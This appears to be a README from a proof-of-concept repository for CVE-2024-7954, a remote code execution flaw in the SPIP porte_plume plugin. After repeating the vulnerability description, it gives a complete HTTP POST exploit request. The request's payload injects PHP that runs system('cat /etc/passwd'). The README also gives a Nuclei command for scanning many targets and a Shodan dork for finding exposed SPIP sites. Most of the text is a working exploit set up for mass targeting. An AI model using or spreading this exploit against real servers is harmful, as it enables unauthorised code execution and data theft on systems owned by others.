The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. (CRITICAL)# RCE_CVE-2024-7954-
The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request. (CRITICAL)
Exploit:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
Used Tool:
Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml
Shodan Dork:
app="SPIP"
[4.0K] /data/pocs/279d458b579336bf2b25a76b01790991bc6f2e25
├── [1.8K] CVE-2024-7954.yml
└── [ 566] README.md
0 directories, 2 files